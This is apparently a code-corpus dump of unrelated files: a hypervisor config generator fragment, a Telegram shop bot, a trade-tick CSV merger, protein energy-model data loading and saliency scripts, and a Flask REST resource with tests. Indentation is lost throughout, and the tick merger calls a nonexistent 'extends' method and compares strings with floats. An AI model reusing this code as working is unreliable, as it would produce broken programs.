sos_bootarg_diff(sos_cmdlines, config)
print("", file=config)
cpu_affinity_per_vm_gen(config)
common_clos_max = board_cfg_lib.get_common_clos_max()
max_mba_clos_entries = common_clos_max
max_cache_clos_entries = common_clos_max
comments_max_clos = '''
/*
* The maximum CLOS that is allowed by ACRN hypervisor,
* its value is set to be least common Max CLOS (CPUID.(EAX=0x10,ECX=ResID):EDX[15:0])
* among all supported RDT resources in the platform. In other words, it is
* min(maximum CLOS of L2, L3 and MBA). This is done in order to have consistent
* CLOS allocations between all the RDT resources.
*/'''
comments_max_mba_clos = '''
/*
* Max number of Cache Mask entries corresponding to each CLOS.
* This can vary if CDP is enabled vs disabled, as each CLOS entry
* will have corresponding cache mask values for Data and Code when
* CDP is enabled.
*/'''
comments_max_cache_clos = '''
/* Max number of MBA delay entries corresponding to each CLOS. */'''
if board_cfg_lib.is_cdp_enabled():
max_cache_clos_entries_cdp_enable = 2 * common_clos_max
(res_info, rdt_res_clos_max, clos_max_mask_list) = board_cfg_lib.clos_info_parser(common.BOARD_INFO_FILE)
common_clos_max_cdp_disable = min(rdt_res_clos_max)
print("#ifdef CONFIG_RDT_ENABLED", file=config)
print("#ifdef CONFIG_CDP_ENABLED", file=config)
print(comments_max_clos, file=config)
print("#define HV_SUPPORTED_MAX_CLOS\t{}U".format(common_clos_max), file=config)
print(comments_max_cache_clos, file=config)
print("#define MAX_CACHE_CLOS_NUM_ENTRIES\t{}U".format(max_cache_clos_entries_cdp_enable), file=config)
print("#else", file=config)
print(comments_max_clos, file=config)
print("#define HV_SUPPORTED_MAX_CLOS\t{}U".format(common_clos_max_cdp_disable), file=config)
print(comments_max_cache_clos, file=config)
print("#define MAX_CACHE_CLOS_NUM_ENTRIES\t{}U".format(max_cache_clos_entries), file=config)
print("#endif", file=config)
print(comments_max_mba_clos, file=config)
print("#define MAX_MBA_CLOS_NUM_ENTRIES\t{}U".format(max_mba_clos_entries), file=config)
else:
print("#ifdef CONFIG_RDT_ENABLED", file=config)
print(comments_max_clos, file=config)
print("#define HV_SUPPORTED_MAX_CLOS\t{}U".format(common_clos_max), file=config)
print(comments_max_mba_clos, file=config)
print("#define MAX_MBA_CLOS_NUM_ENTRIES\t{}U".format(max_mba_clos_entries), file=config)
print(comments_max_cache_clos, file=config)
print("#define MAX_CACHE_CLOS_NUM_ENTRIES\t{}U".format(max_cache_clos_entries), file=config)
if not board_cfg_lib.is_rdt_supported():
print("#endif", file=config)
print("", file=config)
if board_cfg_lib.is_rdt_supported():
(rdt_resources, rdt_res_clos_max, _) = board_cfg_lib.clos_info_parser(common.BOARD_INFO_FILE)
cat_mask_list = common.get_hv_item_tag(common.SCENARIO_INFO_FILE, "FEATURES", "RDT", "CLOS_MASK")
mba_delay_list = common.get_hv_item_tag(common.SCENARIO_INFO_FILE, "FEATURES", "RDT", "MBA_DELAY")
idx = 0
for mba_delay_mask in mba_delay_list:
print("#define MBA_MASK_{}\t\t\t{}U".format(idx, mba_delay_mask), file=config)
idx += 1
idx = 0
for cat_mask in cat_mask_list:
print("#define CLOS_MASK_{}\t\t\t{}U".format(idx, cat_mask), file=config)
idx += 1
print("", file=config)
clos_per_vm_gen(config)
print("#endif", file=config)
print("", file=config)
vm0_pre_launch = False
common.get_vm_types()
for vm_idx,vm_type in common.VM_TYPES.items():
if vm_idx == 0 and scenario_cfg_lib.VM_DB[vm_type]['load_type'] == "PRE_LAUNCHED_VM":
vm0_pre_launch = True
if vm0_pre_launch and board_cfg_lib.is_tpm_passthru():
print("#define VM0_PASSTHROUGH_TPM", file=config)
print("#define VM0_TPM_BUFFER_BASE_ADDR 0xFED40000UL", file=config)
gpa = common.hpa2gpa(0, 0xFED40000, 0x5000)
print("#define VM0_TPM_BUFFER_BASE_ADDR_GPA 0x{:X}UL".format(gpa), file=config)
print("#define VM0_TPM_BUFFER_SIZE 0x5000UL", file=config)
print("", file=config)
pci_dev_num_per_vm_gen(config)
boot_args_per_vm_gen(config)
pt_intx_num_vm0_gen(config)
print("{}".format(MISC_CFG_END), file=config)
return err_dic
``` |
{
"source": "JOHNY2308/personalmate",
"score": 2
} |
#### File: JOHNY2308/personalmate/bot.py
```python
import os
import telebot
from telebot import types
import const
from geopy.distance import vincenty
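# Note: geopy 2.0 removed `vincenty`; on newer geopy versions
# `from geopy.distance import geodesic` is the drop-in replacement used the same way.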
# Example of your code beginning
# Config vars
token = os.environ['TELEGRAM_TOKEN']
# Your bot code below
bot = telebot.TeleBot(token)
markup_menu = types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)
btn_address = types.KeyboardButton('🍔 Ближайший Burger Heroes', request_location=True)
btn_payment = types.KeyboardButton('💵 Способы оплаты')
btn_delivery = types.KeyboardButton('🚗 Способы доставки')
btn_games = types.KeyboardButton('🎮 Игры')
markup_menu.add(btn_address, btn_payment, btn_delivery, btn_games)
markup_menu2 = types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)
btn_game1 = types.KeyboardButton('Игра 1')
btn_game2 = types.KeyboardButton('Игра 2')
btn_game3 = types.KeyboardButton('Игра 3')
btn_back = types.KeyboardButton('⬅ Назад')
markup_menu2.add(btn_game1, btn_game2, btn_game3, btn_back)
markup_inline_payment = types.InlineKeyboardMarkup(row_width=1)
btn_in_cash = types.InlineKeyboardButton('Наличные', callback_data='cash')
btn_in_card = types.InlineKeyboardButton('По карте', callback_data='card')
btn_in_invoice = types.InlineKeyboardButton('Банковский перевод', callback_data='invoice')
markup_inline_payment.add(btn_in_cash, btn_in_card, btn_in_invoice)
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
bot.send_message(message.chat.id, "Привет! Я супербот. Жми на кнопки", reply_markup=markup_menu)
@bot.message_handler(func=lambda message: True)
def echo_all(message):
if message.text == "🚗 Способы доставки":
bot.reply_to(message, "Курьерская доставка!", reply_markup=markup_menu)
elif message.text == "🎮 Игры":
bot.send_message(message.chat.id, "В какую игру вы хотите сыграть?", reply_markup=markup_menu2)
elif message.text == "💵 Способы оплаты":
bot.send_message(message.chat.id, "Вы можете оплатить разными способами! ",
reply_markup=markup_inline_payment)
elif message.text == "Игра 1":
bot.send_message(message.chat.id, "Пока не работает", reply_markup=markup_menu)
elif message.text == "Игра 2":
bot.send_message(message.chat.id, "Пока не работает", reply_markup=markup_menu)
elif message.text == "Игра 3":
bot.send_message(message.chat.id, "Пока не работает", reply_markup=markup_menu)
elif message.text == "⬅ Назад":
bot.send_message(message.chat.id, "И снова привет! Я супербот. Жми на кнопки", reply_markup=markup_menu)
else:
bot.send_message(message.chat.id, "Я пока не научился отвечать на это, жми кнопки!", reply_markup=markup_menu)
@bot.message_handler(func=lambda message: True, content_types=['location'])
def magazin_location(message):
lon = message.location.longitude
lat = message.location.latitude
distance = []
for m in const.MAGAZINS:
result = vincenty((m['latm'], m['lonm']), (lat, lon)).kilometers
distance.append(result)
index = distance.index(min(distance))
bot.send_message(message.chat.id, 'Ближайший к <NAME>!')
bot.send_venue(message.chat.id, const.MAGAZINS[index]['latm'], const.MAGAZINS[index]['lonm'],
const.MAGAZINS[index]['title'], const.MAGAZINS[index]['address'])
@bot.callback_query_handler(func=lambda call: True)
def call_back_payment(call):
if call.data == 'cash':
bot.send_message(call.message.chat.id, text="""
Наличная оплата, производится в рублях, в кассе магазина""", reply_markup=markup_inline_payment)
elif call.data == 'card':
bot.send_message(call.message.chat.id, text="""
Можно оплатить картой""", reply_markup=markup_inline_payment)
elif call.data == 'invoice':
bot.send_message(call.message.chat.id, text="""
Можно банковским переводом""", reply_markup=markup_inline_payment)
bot.polling()
``` |
{
"source": "johny65/wlv",
"score": 2
} |
#### File: johny65/wlv/setup.py
```python
import sys
from setuptools import find_packages, setup
def get_version():
version = open("version").read()
version = version.split("-")[0] if version.endswith("SNAPSHOT") else version
return version
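# For example: a `version` file containing "1.2.0-SNAPSHOT" yields "1.2.0",
# while a plain "1.2.0" is returned unchanged.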
setup(
name='wlv',
version=get_version(),
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=[
'flask',
],
)
if sys.argv[1] == "bdist_wheel":
print("Built version", get_version())
``` |
{
"source": "johnyang101/protein-ebm",
"score": 2
} |
#### File: johnyang101/protein-ebm/data.py
```python
import os
import os.path as osp
import pickle
import random
import numpy as np
from scipy.stats import special_ortho_group
import gemmi
import torch
from constants import test_rotamers
from math_utils import rotate_v1_v2
from mmcif_utils import (
compute_dihedral,
exhaustive_sample,
interpolated_sample_normal,
load_rotamor_library,
mixture_sample_normal,
parse_dense_format,
reencode_dense_format,
rotate_dihedral_fast,
)
from torch.utils.data import Dataset
from tqdm import tqdm
class MMCIFTransformer(Dataset):
def __init__(
self,
FLAGS,
mmcif_path="./mmcif",
split="train",
rank_idx=0,
world_size=1,
uniform=True,
weighted_gauss=False,
gmm=False,
chi_mean=False,
valid=False,
):
files = []
dirs = os.listdir(osp.join(mmcif_path, "mmCIF"))
self.split = split
self.so3 = special_ortho_group(3)
self.chi_mean = chi_mean
self.weighted_gauss = weighted_gauss
self.gmm = gmm
self.uniform = uniform
# Filter out proteins in test dataset
for d in tqdm(dirs):
directory = osp.join(mmcif_path, "mmCIF", d)
d_files = os.listdir(directory)
files_tmp = [osp.join(directory, d_file) for d_file in d_files if ".p" in d_file]
for f in files_tmp:
name = f.split("/")[-1]
name = name.split(".")[0]
if name in test_rotamers and self.split == "test":
files.append(f)
elif name not in test_rotamers and self.split in ["train", "val"]:
files.append(f)
self.files = files
if split in ["train", "val"]:
duplicate_seqs = set()
# Remove proteins in the train dataset that are too similar to the test dataset
with open(osp.join(mmcif_path, "duplicate_sequences.txt"), "r") as f:
for line in f:
duplicate_seqs.add(line.strip())
fids = set()
# Remove low resolution proteins
with open(
osp.join(mmcif_path, "cullpdb_pc90_res1.8_R0.25_d190807_chains14857"), "r"
) as f:
i = 0
for line in f:
                    if i != 0:
fid = line.split()[0]
if fid not in duplicate_seqs:
fids.add(fid)
i += 1
files_new = []
alphabet = []
for letter in range(65, 91):
alphabet.append(chr(letter))
for f in files:
tup = (f.split("/")[-1]).split(".")
if int(tup[1]) >= len(alphabet):
continue
seq_id = tup[0].upper() + alphabet[int(tup[1])]
if seq_id in fids:
files_new.append(f)
self.files = files_new
elif split == "test":
fids = set()
# Remove low resolution proteins
with open(
osp.join(mmcif_path, "cullpdb_pc90_res1.8_R0.25_d190807_chains14857"), "r"
) as f:
i = 0
for line in f:
                    if i != 0:
fid = line.split()[0]
fids.add(fid)
i += 1
files_new = []
alphabet = []
for letter in range(65, 91):
alphabet.append(chr(letter))
for f in files:
tup = (f.split("/")[-1]).split(".")
if int(tup[1]) >= len(alphabet):
continue
seq_id = tup[0].upper() + alphabet[int(tup[1])]
if seq_id in fids:
files_new.append(f)
self.files = files_new
chunksize = len(self.files) // world_size
n = len(self.files)
# Set up a validation dataset
        if split == "train":
            self.files = self.files[: int(0.95 * n)]
        elif split == "val":
            self.files = self.files[int(0.95 * n) :]
self.FLAGS = FLAGS
self.db = load_rotamor_library()
print(f"Loaded {len(self.files)} files for {split} dataset split")
self.split = split
def __len__(self):
return len(self.files)
def __getitem__(self, index, forward=False):
FLAGS = self.FLAGS
if FLAGS.single and not forward:
index = 0
FLAGS = self.FLAGS
pickle_file = self.files[index]
# node_embed: D x 6
(node_embed,) = pickle.load(open(pickle_file, "rb"))
node_embed_original = node_embed
# Remove proteins with small numbers of atoms
if node_embed.shape[0] < 20:
return self.__getitem__((index + 1) % len(self.files), forward=True)
# Remove invalid proteins
if (
node_embed.max(axis=0)[2] >= 21
or node_embed.max(axis=0)[0] >= 20
or node_embed.max(axis=0)[1] >= 5
):
return self.__getitem__((index + 1) % len(self.files), forward=True)
par, child, pos, pos_exist, res, chis_valid = parse_dense_format(node_embed)
if par is None:
return self.__getitem__((index + 1) % len(self.files), forward=True)
if len(res) < 5:
return self.__getitem__((index + 1) % len(self.files), forward=True)
angles = compute_dihedral(par, child, pos, pos_exist)
tries = 0
perm = np.random.permutation(np.arange(1, len(res) - 1))
select_idxs = []
while True:
            # Randomly sample an amino acid that is not the first or last amino acid
idx = perm[tries]
if res[idx] == "gly" or res[idx] == "ala":
idx = random.randint(1, len(res) - 2)
else:
select_idxs.append(idx)
if len(select_idxs) == FLAGS.multisample:
break
tries += 1
if tries > 1000 or tries == perm.shape[0]:
return self.__getitem__((index + 1) % len(self.files), forward=True)
node_embeds = []
node_embeds_negatives = []
select_atom_idxs = []
select_atom_masks = []
select_chis_valids = []
select_ancestors = []
for idx in select_idxs:
neg_samples = []
gt_chis = [(angles[idx, 4:8], chis_valid[idx, :4])]
neg_chis = []
# Choose number of negative samples
if FLAGS.train and self.split in ["val", "test"]:
neg_sample = 150
else:
neg_sample = FLAGS.neg_sample
atom_idxs = []
atoms_mask = []
chis_valids = []
ancestors = []
if self.split == "test":
dist = np.sqrt(np.square(pos[idx : idx + 1, 2] - pos[:, 2]).sum(axis=1))
neighbors = (dist < 10).sum()
                # Choose different thresholds of sampling depending on whether an atom is dense
# or not
if neighbors < 24:
tresh = 0.95
else:
tresh = 0.98
if self.weighted_gauss:
chis_list = interpolated_sample_normal(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
neg_sample,
uniform=self.uniform,
)
elif self.gmm:
chis_list = mixture_sample_normal(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
neg_sample,
uniform=self.uniform,
)
else:
chis_list = exhaustive_sample(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
tresh=tresh,
chi_mean=self.chi_mean,
)
if len(chis_list) < neg_sample:
repeat = neg_sample // len(chis_list) + 1
chis_list = chis_list * repeat
random.shuffle(chis_list)
else:
dist = np.sqrt(np.square(pos[idx : idx + 1, 2] - pos[:, 2]).sum(axis=1))
neighbors = (dist < 10).sum()
if neighbors < 24:
tresh = 1.0
else:
tresh = 1.0
if self.weighted_gauss:
chis_list = interpolated_sample_normal(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
neg_sample,
uniform=self.uniform,
)
elif self.gmm:
chis_list = mixture_sample_normal(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
neg_sample,
uniform=self.uniform,
)
else:
chis_list = exhaustive_sample(
self.db,
angles[idx, 1],
angles[idx, 2],
res[idx],
tresh=tresh,
chi_mean=self.chi_mean,
)
if len(chis_list) < neg_sample:
repeat = neg_sample // len(chis_list) + 1
chis_list = chis_list * repeat
random.shuffle(chis_list)
for i in range(neg_sample):
chis_target = angles[:, 4:8].copy()
chis = chis_list[i]
chis_target[idx] = (
chis * chis_valid[idx, :4] + (1 - chis_valid[idx, :4]) * chis_target[idx]
)
pos_new = rotate_dihedral_fast(
angles, par, child, pos, pos_exist, chis_target, chis_valid, idx
)
node_neg_embed = reencode_dense_format(node_embed, pos_new, pos_exist)
neg_samples.append(node_neg_embed)
neg_chis.append((chis_target[idx], chis_valid[idx, :4]))
nelem = pos_exist[:idx].sum()
offset = pos_exist[idx].sum()
mask = np.zeros(20)
mask[:offset] = 1
atom_idxs.append(
np.concatenate(
[np.arange(nelem, nelem + offset), np.ones(20 - offset) * (nelem)]
)
)
atoms_mask.append(mask)
chis_valids.append(chis_valid[idx, :4].copy())
ancestors.append(np.stack([par[idx], child[idx]], axis=0))
node_embed_negative = np.array(neg_samples)
pos_chosen = pos[idx, 4]
atoms_mask = np.array(atoms_mask)
atom_idxs = np.array(atom_idxs)
chis_valids = np.array(chis_valids)
ancestors = np.array(ancestors)
            # Choose the closest atoms to the chosen location:
close_idx = np.argsort(np.square(node_embed[:, -3:] - pos_chosen).sum(axis=1))
node_embed_short = node_embed[close_idx[: FLAGS.max_size]].copy()
pos_chosen = pos_new[idx, 4]
close_idx_neg = np.argsort(
np.square(node_embed_negative[:, :, -3:] - pos_chosen).sum(axis=2), axis=1
)
# Compute the corresponding indices for atom_idxs
# Get the position of each index ik
pos_code = np.argsort(close_idx_neg, axis=1)
choose_idx = np.take_along_axis(pos_code, atom_idxs.astype(np.int32), axis=1)
if choose_idx.max() >= FLAGS.max_size:
return self.__getitem__((index + 1) % len(self.files), forward=True)
node_embed_negative = np.take_along_axis(
node_embed_negative, close_idx_neg[:, : FLAGS.max_size, None], axis=1
)
# Normalize each coordinate of node_embed to have x, y, z coordinate to be equal 0
node_embed_short[:, -3:] = node_embed_short[:, -3:] - np.mean(
node_embed_short[:, -3:], axis=0
)
node_embed_negative[:, :, -3:] = node_embed_negative[:, :, -3:] - np.mean(
node_embed_negative[:, :, -3:], axis=1, keepdims=True
)
if FLAGS.augment:
# Now rotate all elements
rot_matrix = self.so3.rvs(1)
node_embed_short[:, -3:] = np.matmul(node_embed_short[:, -3:], rot_matrix)
rot_matrix_neg = self.so3.rvs(node_embed_negative.shape[0])
node_embed_negative[:, :, -3:] = np.matmul(
node_embed_negative[:, :, -3:], rot_matrix_neg
)
# # Additionally scale values to be in the same scale
node_embed_short[:, -3:] = node_embed_short[:, -3:] / 10.0
node_embed_negative[:, :, -3:] = node_embed_negative[:, :, -3:] / 10.0
# Augment the data with random rotations
node_embed_short = torch.from_numpy(node_embed_short).float()
node_embed_negative = torch.from_numpy(node_embed_negative).float()
if self.split == "train":
node_embeds.append(node_embed_short)
node_embeds_negatives.append(node_embed_negative)
elif self.split in ["val", "test"]:
return node_embed_short, node_embed_negative, gt_chis, neg_chis, res[idx]
return node_embeds, node_embeds_negatives
def collate_fn_transformer(inp):
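    # Pad each variable-length atom neighborhood to the largest one in the batch
    # and flatten the per-sample negatives into a single batch dimension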
node_embed, node_embed_neg = zip(*inp)
node_embed, node_embed_neg = sum(node_embed, []), sum(node_embed_neg, [])
max_size = max([ne.size(0) for ne in node_embed])
neg_sample_size = node_embed_neg[0].size(0)
sizes = list(node_embed_neg[0].size())
node_embed_batch = torch.zeros(*(len(node_embed), max_size, node_embed[0].size(1)))
node_embed_neg_batch = (node_embed_batch.clone()[:, None, :, :]).repeat(1, sizes[0], 1, 1)
for i, (ne, neg) in enumerate(zip(node_embed, node_embed_neg)):
node_embed_batch[i, : ne.size(0), :] = ne
node_embed_neg_batch[i, :, : neg.size(1), :] = neg
sizes = list(node_embed_neg_batch.size())
node_embed_neg_batch = node_embed_neg_batch.view(-1, *sizes[2:])
return node_embed_batch, node_embed_neg_batch
def collate_fn_transformer_test(inp):
node_embed, node_embed_neg, gt_chis, neg_chis, res = zip(*inp)
max_size = max([ne.size(0) for ne in node_embed])
neg_sample_size = node_embed_neg[0].size(0)
sizes = list(node_embed_neg[0].size())
node_embed_batch = torch.zeros(*(len(node_embed), max_size, node_embed[0].size(1)))
node_embed_neg_batch = (node_embed_batch.clone()[:, None, :, :]).repeat(1, sizes[0], 1, 1)
for i, (ne, neg) in enumerate(zip(node_embed, node_embed_neg)):
node_embed_batch[i, : ne.size(0), :] = ne
node_embed_neg_batch[i, :, : neg.size(1), :] = neg
sizes = list(node_embed_neg_batch.size())
node_embed_neg_batch = node_embed_neg_batch.view(-1, *sizes[2:])
return node_embed_batch, node_embed_neg_batch, gt_chis, neg_chis, res
```
#### File: protein-ebm/scripts/extract_saliency.py
```python
import argparse
import collections
import pathlib
import pickle
import numpy as np
import models
import torch
from config import MMCIF_PATH
def _construct_residue_atom_indices(node_embed, pos, pos_exist):
"""Dirty nonsense to get a (residue_index, atom_index) pair for each element
in node_embed."""
def _hash(vec3):
return (vec3[0], vec3[1], vec3[2])
vec_to_indices = {}
for residue_index in range(pos.shape[0]):
for atom_index in range(pos.shape[1]):
if not pos_exist[residue_index, atom_index]:
continue
pos_chosen = pos[residue_index, atom_index]
vec_to_indices[_hash(pos_chosen)] = (residue_index, atom_index)
residue_and_atom_indices = -np.ones((node_embed.shape[0], 2), dtype=np.int64)
for idx in range(0, node_embed.shape[0]):
node_embed_pos = node_embed[idx, -3:] # 3-dim
residue_and_atom_indices[idx] = np.array(
list(vec_to_indices[_hash(node_embed_pos)]), dtype=np.int64
)
return residue_and_atom_indices
def attention_vis(args, model, node_embed, pos, pos_exist):
"""Main function to visualize attention maps around each residue."""
residue_and_atom_indices = _construct_residue_atom_indices(node_embed, pos, pos_exist)
results = collections.OrderedDict()
for idx in range(pos.shape[0]):
for center_atom in list(range(5)):
# sort the atoms by how far away they are
# sort key is the first atom on the sidechain
pos_chosen = pos[idx, center_atom]
close_idx = np.argsort(np.square(node_embed[:, -3:] - pos_chosen).sum(axis=1))
close_idx = close_idx[: args.max_size]
# Grab the 64 closest atoms
node_embed_short = node_embed[close_idx].copy()
close_residue_and_atom_indices = residue_and_atom_indices[close_idx].copy()
# Normalize each coordinate of node_embed to have x, y, z coordinate to be equal 0
node_embed_short[:, -3:] = node_embed_short[:, -3:] - np.mean(
node_embed_short[:, -3:], axis=0
)
# Torch-ify & enable grads
node_embed_short = node_embed_short[np.newaxis, :, :]
node_embed_short = torch.from_numpy(node_embed_short).float().cuda()
node_embed_short.requires_grad = True
with torch.autograd.enable_grad():
energy = model(node_embed_short)
energy_sum = energy.sum()
node_embed_short_grad = torch.autograd.grad([energy_sum], [node_embed_short])[0]
node_embed_short_grad = node_embed_short_grad[:, :, -3:].detach().cpu().numpy()
assert node_embed_short_grad.shape[0] == 1
grad_norms = np.linalg.norm(node_embed_short_grad[0], axis=1)
result = {
"center_position": np.array([idx, center_atom], dtype=np.int64),
"viewport_grad_norms": grad_norms,
"viewport_positions": close_residue_and_atom_indices,
}
results[(idx, center_atom)] = result
return results
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--pdb_name", type=str, required=True)
parser.add_argument("--results_file", type=pathlib.Path, required=True)
parser.add_argument("--model_file", type=pathlib.Path, default=None)
parser.add_argument(
"--cache_dir",
type=pathlib.Path,
default=pathlib.Path(MMCIF_PATH + "/mmCIF/"),
)
# Transformer arguments
parser.add_argument(
"--encoder_layers",
type=int,
default=6,
help="number of layers to apply the transformer on",
)
parser.add_argument("--dropout", type=float, default=0.0, help="chance of dropping out a unit")
parser.add_argument(
"--relu_dropout", type=float, default=0.0, help="chance of dropping out a relu unit"
)
parser.add_argument(
"--encoder_normalize_after",
action="store_false",
dest="encoder_normalize_before",
help="whether to normalize outputs before",
)
parser.add_argument(
"--encoder_attention_heads",
type=int,
default=8,
help="number of heads of attention to use",
)
parser.add_argument(
"--attention_dropout", type=float, default=0.0, help="dropout rate of attention"
)
parser.add_argument(
"--encoder_ffn_embed_dim",
type=int,
default=1024,
help="hidden dimension to use in transformer",
)
parser.add_argument(
"--encoder_embed_dim", type=int, default=256, help="original embed dimension of element"
)
parser.add_argument("--max_size", type=int, default=64, help="maximum size of time series")
return parser
def main(args):
model = models.RotomerTransformerModel(args)
model = model.cuda()
model = model.eval()
if args.model_file is not None:
checkpoint = torch.load(args.model_file)
model_state_dict = {
k.replace("module.", ""): v for k, v in checkpoint["model_state_dict"].items()
}
model.load_state_dict(model_state_dict)
cache_file = args.cache_dir / args.pdb_name[1:3] / f"{args.pdb_name}.cache"
with open(cache_file, "rb") as infile:
node_embed, par, child, pos, pos_exist, res, chis_valid, angles = pickle.load(infile)
viewport_results = attention_vis(args, model, node_embed, pos, pos_exist)
with open(args.results_file, "wb") as outfile:
pickle.dump({
"viewports": viewport_results,
"residues": res,
}, outfile)
if __name__ == "__main__":
parser = create_parser()
args = parser.parse_args()
main(args)
```
#### File: protein-ebm/scripts/generate_colormap_saliency.py
```python
import argparse
import pathlib
import pickle
import numpy as np
import amino_acid_config
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--results_file", type=pathlib.Path, required=True)
parser.add_argument("--color_file", type=pathlib.Path, required=True)
parser.add_argument("--viewport_center_res", type=int, required=True)
parser.add_argument("--viewport_center_atom", type=int, required=True)
return parser
def to_atom_name(res, atom_idx):
return amino_acid_config.res_atoms[res.upper()][atom_idx]
def intensity_to_color(intensity):
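    # Interpolate from near-white (intensity 0) to pure red (intensity 1)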
assert 0 <= intensity <= 1
return 1.0, (1.0 - intensity) * 0.8, (1.0 - intensity) * 0.8
def main(args):
with open(args.results_file, "rb") as infile:
results = pickle.load(infile)
viewports = results["viewports"]
residues = results["residues"]
viewport = viewports[args.viewport_center_res, args.viewport_center_atom]
norms = viewport["viewport_grad_norms"]
maxnorm = norms.max()
residue_and_atom_indices = viewport["viewport_positions"]
assert norms.shape[0] == residue_and_atom_indices.shape[0]
center_residue_index, center_atom_index = viewport["center_position"]
ordered_residues = np.argsort(norms)
rankings = np.zeros(len(norms))
rankings[ordered_residues] = np.arange(len(norms)) + 1
intensities = rankings / len(norms)
intensities = intensities ** 5.0
with open(args.color_file, "w") as outfile:
for i, intensity in enumerate(intensities):
residue_index, atom_index = residue_and_atom_indices[i]
atom_name = to_atom_name(residues[residue_index], atom_index)
r, g, b = intensity_to_color(intensity)
if residue_index == center_residue_index and atom_index >= 4:
g, r, b = r, g, b
print(residue_index, atom_name, r, g, b, sep=",", file=outfile)
if __name__ == "__main__":
parser = create_parser()
args = parser.parse_args()
main(args)
``` |
{
"source": "john-yan/SierraChartUtilities",
"score": 3
} |
#### File: john-yan/SierraChartUtilities/run-combine-ticks.py
```python
import argparse
from select import select
import re, json
from functools import reduce
from time import sleep
from utilities import follow
import math
trade_header = "DateTime,Price,Volume,AtBidOrAsk\n"
trade_format = '%.1f,%.2f,%.1f,%.1f\n'
def RemoveLastSecondTrades(data):
if len(data) == 0:
return data
# remove the last second
last_second = data[-1][0]
while True:
if data[-1][0] == last_second:
del data[-1]
else:
break
return data
def ReadFile(f):
header = f.readline()
assert(header == trade_header)
data = []
for line in f:
values = line.rstrip().split(',')
dt = float(values[0])
price = float(values[1])
volume = float(values[2])
at_bid_or_ask = float(values[3])
data.append((dt, price, volume, at_bid_or_ask))
return data
def AppendTrades(data, new_trades):
if len(data) == 0:
return new_trades
last_second = data[-1][0]
index = 0
for index in range(0, len(new_trades)):
if new_trades[index][0] > last_second:
break
    data.extend(new_trades[index:])
return data
def ProcessFiles(infiles, outfile, follow_mode):
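    # Merge all but the last input file, dropping each file's trailing (possibly
    # incomplete) second, then stream the last file, optionally following it as it grows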
trades = []
for f in infiles[:-1]:
new_trades = ReadFile(f)
new_trades = RemoveLastSecondTrades(new_trades)
trades = AppendTrades(trades, new_trades)
# output all data up to now
outfile.write(trade_header)
for trade in trades:
outfile.write(trade_format % trade)
assert(len(trades) > 0)
last_second = trades[-1][0]
del trades
header = infiles[-1].readline()
assert(header == trade_header)
read_from = infiles[-1]
if follow_mode:
read_from = follow(infiles[-1], 10)
for line in read_from:
values = line.rstrip().split(',')
        if float(values[0]) > last_second:
outfile.write(line)
break
for line in read_from:
outfile.write(line)
outfile.flush()
def Main():
parser = argparse.ArgumentParser()
parser.add_argument('--inputs', '-i', required=True, help="input csv files")
parser.add_argument('--output', '-o', required=True, help="output csv file")
parser.add_argument('--follow', '-f', default=False, action='store_true', help="Do we follow the input file?")
args = parser.parse_args()
filenames = args.inputs.split(',')
files = []
for fn in filenames:
files.append(open(fn, 'r'))
assert(files[-1])
outfile = open(args.output, 'w')
if not outfile:
print('Unable to open output file: ', outfile)
exit(-1)
ProcessFiles(files, outfile, args.follow)
if __name__ == '__main__':
Main()
``` |
{
"source": "johny-b/blargh",
"score": 2
} |
#### File: api/flask/resource.py
```python
from flask import request
from flask_restful import Resource as FRResource, reqparse
from blargh.engine import Engine
import json
class Resource(FRResource):
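    """Generic Flask-RESTful resource that forwards each HTTP verb to the blargh
    Engine for the resource named by its `model` attribute."""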
model = None
def get(self, id_=None, auth=None):
args = self._get_args()
kwargs = {
'auth': auth,
'depth': args['depth'],
'limit': args['limit'],
'filter_': {},
}
if args['filter']:
try:
kwargs['filter_'] = json.loads(args['filter'])
except json.decoder.JSONDecodeError:
return {'msg': 'Filter is not a valid json'}, 400, {}
if args['sort']:
try:
kwargs['sort'] = json.loads(args['sort'])
except json.decoder.JSONDecodeError:
return {'msg': 'sort is not a valid json'}, 400, {}
data, status = Engine.get(self.model.name, id_, **kwargs)
return data, status, {}
def delete(self, id_, auth=None):
data, status = Engine.delete(self.model.name, id_, auth=auth)
return data, status, {}
def post(self, auth=None):
data, status = Engine.post(self.model.name, request.get_json(), auth=auth)
return data, status, {}
def put(self, id_, auth=None):
data, status = Engine.put(self.model.name, id_, request.get_json(), auth=auth)
return data, status, {}
def patch(self, id_, auth=None):
data, status = Engine.patch(self.model.name, id_, request.get_json(), auth=auth)
return data, status, {}
def _get_args(self):
parser = reqparse.RequestParser()
parser.add_argument('depth', type=int, default=1, location='args')
parser.add_argument('filter', type=str, default='', location='args')
parser.add_argument('limit', type=int, location='args')
parser.add_argument('sort', type=str, location='args')
return parser.parse_args(strict=False)
```
#### File: example/cookies/__init__.py
```python
from .data_model import dm
from . import create
from .pg_schema import pg_schema_sql
def world_data(storage_name):
if storage_name in ['DictStorage', 'PickledDictStorage']:
return {
'jar': {1: {'id': 1, 'cookies': [1, 2]},
2: {'id': 2, 'cookies': [3]}},
'cookie': {1: {'id': 1, 'jar': 1, 'type': 'biscuit'},
2: {'id': 2, 'jar': 1, 'type': 'muffin'},
3: {'id': 3, 'jar': 2, 'type': 'shortbread'}}}
elif storage_name == 'PGStorage':
return {
'jar': [(1,), (2,)],
'cookie': [(1, 1, 'biscuit'),
(2, 1, 'muffin'),
(3, 2, 'shortbread')]}
raise Exception("Unknown data for storage {}".format(storage_name))
```
#### File: auth/pg_storage_user_id/test_user_id_delete.py
```python
import pytest
from tests.auth.pg_storage_user_id.helpers import init_cookies_with_user_id
##############
# DELETE #
##############
@pytest.mark.parametrize("user_id, resource, id_, expected_status", (
(1, 'cookie', 1, 200),
(1, 'cookie', 2, 200),
(1, 'cookie', 3, 404),
(2, 'cookie', 1, 404),
(2, 'cookie', 2, 404),
(2, 'cookie', 3, 200),
(1, 'jar', 1, 200),
(1, 'jar', 2, 404),
(2, 'jar', 1, 404),
